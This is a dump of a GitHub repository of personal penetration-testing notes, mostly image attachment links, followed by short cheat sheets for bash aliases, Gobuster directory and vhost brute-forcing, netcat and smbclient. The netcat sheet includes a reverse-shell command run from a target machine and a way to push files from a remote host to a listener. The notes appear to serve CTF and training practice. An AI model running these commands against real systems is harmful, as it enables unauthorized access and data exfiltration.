https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210613124656.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210613134757.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210613134757.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210613134842.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210613134842.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210613135029.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210613135029.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210613135104.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210613135104.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614082656.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614082656.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614082713.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614082713.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614085505.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614085505.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614085530.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614085530.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614092358.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614092358.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614092432.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614092432.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614092454.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614092454.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614092556.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614092556.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614093230.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614093230.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614093422.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614093422.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614100713.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614100713.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614101325.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614101325.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614103350.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614103350.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614103814.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614103814.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614105016.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614105016.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614105225.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614105225.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614105519.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614105519.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614115346.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614115346.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614115441.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614115441.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614115505.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614115505.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614115751.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614115751.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614120008.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614120008.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614120025.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614120025.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614120438.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614120438.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614120758.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614120758.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614120816.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614120816.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614123703.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614123703.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614132531.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614132531.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614132628.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614132628.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614132807.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614132807.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210614132849.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210614132849.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210619220508.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210619220508.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210619220700.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210619220700.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210619220754.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210619220754.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210619220834.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210619220834.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210619220854.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210619220854.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210619220929.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210619220929.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210621224914.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210621224914.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210625215523.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210625215523.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210625215555.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210625215555.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210626114517.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210626114517.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210626132335.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210626132335.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210626132407.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210626132407.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210626132511.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210626132511.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210626132540.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210626132540.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210628184558.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210628184558.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210715202006.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210715202006.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210715202129.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210715202129.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210715202930.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210715202930.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210715203034.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210715203034.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210715203120.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210715203120.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210715203218.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210715203218.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210715203759.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210715203759.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210715203837.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210715203837.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210715203948.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210715203948.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210715204001.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210715204001.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210715204300.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210715204300.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210715204447.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210715204447.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210715205242.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210715205242.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210715205357.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210715205357.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210715212801.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210715212801.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210715222444.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210715222444.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20210715223211.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20210715223211.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20211119172219.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20211119172219.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20211119172932.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20211119172932.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20211119174505.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20211119174505.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20211119175244.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20211119175244.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20211119175626.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20211119175626.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20211121203851.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20211121203851.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20211121223427.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20211121223427.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20211121223522.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20211121223522.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20211121223548.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20211121223548.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20211121223624.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20211121223624.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20211121224508.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20211121224508.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20211121224601.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20211121224601.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20211121224706.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20211121224706.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20211121225027.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20211121225027.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20211121225454.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20211121225454.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20211121225817.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20211121225817.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20211121225903.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20211121225903.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20211121225935.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20211121225935.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20211121230551.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20211121230551.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20211121230646.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20211121230646.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20211121230757.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20211121230757.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20211121230915.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20211121230915.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20211121230956.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20211121230956.png -------------------------------------------------------------------------------- /Attachments/Pasted image 20211121231045.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Twigonometry/Cybersecurity-Notes/6034c0860f93ad603f5b6d6ad5f46885a6a48ebe/Attachments/Pasted image 20211121231045.png -------------------------------------------------------------------------------- /Cheat Sheets/Aliases.md: -------------------------------------------------------------------------------- 1 | # Aliases 2 | 3 | ## Useful Aliases 4 | 5 | These are some examples of personal aliases I've used. They allow me to quickly navigate to certain respositories and quickly open files. 6 | 7 | ```bash 8 | # Running VPNs 9 | alias htbvpn="sudo openvpn ~/Documents/HTB\ Access/Twigonometry.ovpn" 10 | alias ravpn="sudo openvpn ~/Documents/HTB\ Access/release_arena_Twigonometry.ovpn " 11 | alias thmvpn="sudo openvpn ~/Documents/THM\ Access/Twigonometry.ovpn" 12 | alias seshvpn="sudo openvpn ~/Documents/HTB\ Access/shefesh.ovpn" 13 | 14 | # Edit common files 15 | alias nanbash="nano ~/.bashrc" 16 | alias nanhosts="nano /etc/hosts" 17 | 18 | # Start webserver in enum directory 19 | alias enumserve="cd ~/Documents/enum; python3 -m http.server" 20 | 21 | # Run ghidra, deleting cache file to eliminate startup issues 22 | alias run-ghidra="rm -r ~/.ghidra; /opt/ghidra/ghidra_9.2.2_PUBLIC/ghidraRun" 23 | 24 | # Go to common directories 25 | alias sesh-site="cd ~/Documents/SESH/SeshWebsite" 26 | alias sesh-serve="cd ~/Documents/SESH/SeshWebsite; bundle exec jekyll serve" 27 | alias raspictf="cd ~/Documents/SESH/RaspiCTF" 28 | 29 | # Run obsidian 30 | alias obsidian="~/Applications/Obsidian-0.11.9.AppImage --no-sandbox" 31 | ``` 32 | 33 | ## Adding Aliases 34 | 35 | ```bash 36 | nano ~/.bashrc 37 | [...type your code and save...] 38 | source ~/.bashrc 39 | ``` 40 | 41 | # Tags 42 | 43 | #cheat-sheet -------------------------------------------------------------------------------- /Cheat Sheets/Common Tools/Gobuster.md: -------------------------------------------------------------------------------- 1 | # Gobuster 2 | 3 | A tool for brute forcing webpages (aka directory busting), DNS names, and virtual hosts - written in [Go](https://golang.org/). 4 | 5 | The repository can be found at [https://github.com/OJ/gobuster](https://github.com/OJ/gobuster) 6 | 7 | ## Installation 8 | 9 | ### Kali Linux 10 | 11 | `gobuster` does not come preinstalled on Kali Linux, but it does have a package. Install with: 12 | 13 | ```bash 14 | $ sudo apt-get install gobuster 15 | ``` 16 | 17 | ### Other Operating Systems 18 | 19 | If your package manager doesn't have `gobuster`, or you want to install from source on Kali instead of using `apt`, you can follow the [installation instructions](https://github.com/OJ/gobuster#easy-installation) in the repo. 20 | 21 | ## Dir Busting 22 | 23 | **Basic Syntax** 24 | 25 | ```bash 26 | $ gobuster dir -u [URL] -w /path/to/wordlist 27 | ``` 28 | 29 | **Which Wordlist to Use?** 30 | 31 | I like to use the [SecLists](https://github.com/danielmiessler/SecLists) Discovery lists. The most common one I use is located at `/path/to/seclists/Discovery/Web-Content/raft-small-words.txt`. SecLists comes preinstalled on Kali Linux, and is found at `/usr/share/seclists`. 32 | 33 | You may also wish to use a larger list, such as `raft-large-words.txt`, or a list for a specific platform, such as `tomcat.txt` against a known Tomcat server. 34 | 35 | If you do not wish to install SecLists some distributions come with alternative wordlists, for example `/usr/share/wordlists/dirb/common.txt`. However, many of the `dirb` wordlists miss important items, such as checking for a `.git` file. 36 | 37 | **Add Extensions** 38 | 39 | If you know your target site is using a specific file extension, such as `php` or `jsp`, you can specify this with the `-x` flag 40 | 41 | ```bash 42 | $ gobuster dir -u example.com -w /path/to/wordlist -x php,asp 43 | ``` 44 | 45 | ## VHOST Busting 46 | 47 | You can also use Gobuster to brute force Virtual Hosts (aka subdomains). Use `vhost` mode to do this. 48 | 49 | **Basic Syntax** 50 | 51 | ```bash 52 | gobuster vhost -u example.com -w /path/to/wordlist 53 | ``` 54 | 55 | This will append subdomains to the beginning of the hostname, e.g. `staging.example.com`. A good wordlist can be found at `/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt`. 56 | 57 | Practical example: 58 | IppSec does this on [Academy](https://youtu.be/yQl5RA6APyQ?t=306) 59 | 60 | # Tags 61 | 62 | #cheat-sheet #enum -------------------------------------------------------------------------------- /Cheat Sheets/Common Tools/netcat.md: -------------------------------------------------------------------------------- 1 | # Netcat 2 | 3 | Detailed cheat sheet available here: [https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf](https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf) 4 | 5 | `nc` can be used as shorthand for `netcat` on some machines. 6 | 7 | ## Basic Client 8 | 9 | I.e. connect to an arbitrary port on an IP address: 10 | 11 | ```bash 12 | $ nc [IP] [PORT] 13 | ``` 14 | 15 | ## Basic Listener 16 | 17 | I.e. receive connections on an arbitrary port: 18 | 19 | ```bash 20 | $ nc -lp [PORT] 21 | ``` 22 | 23 | ## File Transfer 24 | 25 | Setup a listener on host that pushes to an outfile: 26 | 27 | ```bash 28 | $ nc -lp [PORT] > /path/to/outfile 29 | ``` 30 | 31 | From the client (remote machine), push a file back to the listener: 32 | 33 | ```bash 34 | $ nc -w3 [IP] [PORT] < /path/to/infile 35 | ``` 36 | 37 | ## Send a Reverse Shell 38 | 39 | From target machine: 40 | 41 | ```bash 42 | $ nc [HOST_IP] [PORT] -e /bin/bash 43 | ``` 44 | 45 | # Tags 46 | 47 | #cheat-sheet -------------------------------------------------------------------------------- /Cheat Sheets/Common Tools/smbclient.md: -------------------------------------------------------------------------------- 1 | # smbclient 2 | 3 | `smbclient` is a tool used to connect to Samba servers - Samba is a Windows-based filesharing protocol. 4 | 5 | ## Basic Syntax 6 | 7 | Connect to a server: 8 | 9 | ```bash 10 | $ smbclient //[IP] 11 | ``` 12 | 13 | Connect to a specific share: 14 | 15 | ```bash 16 | $ smbclient //[IP]/[SHARE] 17 | ``` 18 | 19 | ### Basic Commands 20 | 21 | **File Upload and Download** 22 | 23 | Use `get` to download a file to your local machine's current working directory: 24 | 25 | ```bash 26 | smb: \> get [FILE] 27 | ``` 28 | 29 | Use `put` to upload a file from your local machine's current working directory: 30 | 31 | ```bash 32 | smb: \> put [FILE] 33 | ``` 34 | 35 | 